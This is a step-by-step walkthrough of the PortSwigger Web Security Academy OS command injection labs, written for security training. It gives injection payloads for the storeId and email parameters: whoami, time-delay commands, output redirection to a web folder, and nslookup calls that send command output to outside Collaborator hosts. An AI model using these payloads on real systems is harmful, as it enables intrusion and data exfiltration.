Walk-through of the OS command injection lab on PortSwigger Web Security Academy.

Use the Hackvertor extension to URL encode the payload.
- Apprentice – OS command injection, simple case
- Practitioner – Blind OS command injection with time delays
- Practitioner – Blind OS command injection with output redirection
- Practitioner – Blind OS command injection with out-of-band interaction
- Practitioner – Blind OS command injection with out-of-band data exfiltration
Apprentice – OS command injection, simple case
Check stock for a product
POST /product/stock HTTP/1.1
Send the request to the Repeater module.
Do a command injection in the storeId parameter
Modify the request in the Repeater module with this payload:
productId=1&storeId=<@urlencode>1 && whoami<@/urlencode>
Other payload that work:
productId=1&storeId=<@urlencode>1 | whoami<@/urlencode>
Practitioner – Blind OS command injection with time delays
Click on the Submit feedback link. Enter any feedback and inspect the request.
POST /feedback/submit HTTP/1.1
Send the request to the Repeater module.
Do a command injection in the email parameter
Modify the request in the Repeater module with this payload:
csrf=UkOO8nQrtWJkS2G2TcIYpJSotG6RYFnK&name=test&email=<@urlencode>; ping -c 10; <@/urlencode>&subject=test&message=whatever
csrf=UkOO8nQrtWJkS2G2TcIYpJSotG6RYFnK&name=test&email=<@urlencode>; sleep 10; <@/urlencode>&subject=test&message=whatever
Practitioner – Blind OS command injection with output redirection

There is a writable folder in the lab: /var/www/images/
Click on the Submit feedback link. Enter any feedback and inspect the request.
POST /feedback/submit HTTP/1.1
Do a command injection in the email parameter
Modify the request in the Repeater module with this payload:
csrf=uBVylSsu0ow53swpS6xlvARvS3ssmZbu&name=whatever&email=<@urlencode>; whoami > /var/www/images/whoami.txt; <@/urlencode>&subject=whatever&message=whatever
Access the file created by the command injection
GET /image?filename=whoami.txt HTTP/1.1
Practitioner – Blind OS command injection with out-of-band interaction

To solve the lab, you must use Burp Collaborator’s default public server.
Click on the Submit feedback link. Enter any feedback and inspect the request.
POST /feedback/submit HTTP/1.1
Send the request to the Repeater module.
Do a command injection in the email parameter
Click on the Collaborator tab and click on Copy to clipboard to get the Collaborator URL. Modify the request in the Repeater module with this payload (replace the URL with your specific Collaborator URL):
csrf=WLiemipQMCM32hAdtbUAIy7jLl6uYE15&name=whatever&email=<@urlencode>; nslookup wtt9phrz2a46l0lc8a9v0q8yipogc70w.oastify.com; <@/urlencode>&subject=whatever&message=whatever
Practitioner – Blind OS command injection with out-of-band data exfiltration

To solve the lab, you must use Burp Collaborator’s default public server.
Click on the Submit feedback link. Enter any feedback and inspect the request.
POST /feedback/submit HTTP/1.1
Send the request to the Repeater module.
Do a command injection in the email parameter
Click on the Collaborator tab and click on Copy to clipboard to get the Collaborator URL. Modify the request in the Repeater module with this payload (replace the URL with your specific Collaborator URL):
csrf=UCrWtm65NytEPwe3YCHjw3KscZsuJaeU&name=whatever&email=<@urlencode>; nslookup `whoami`.gl5th1jjuuwqdkdw0u1fsa0ia9g04ssh.oastify.com; <@/urlencode>&subject=whatever&message=whatever
Click on Poll now in the Collaborator tab.
The Collaborator server received a DNS lookup of type A for the domain name peter-h7HHUD.gl5th1jjuuwqdkdw0u1fsa0ia9g04ssh.oastify.com.
Submit peter-h7HHUD as the answer to solve the lab.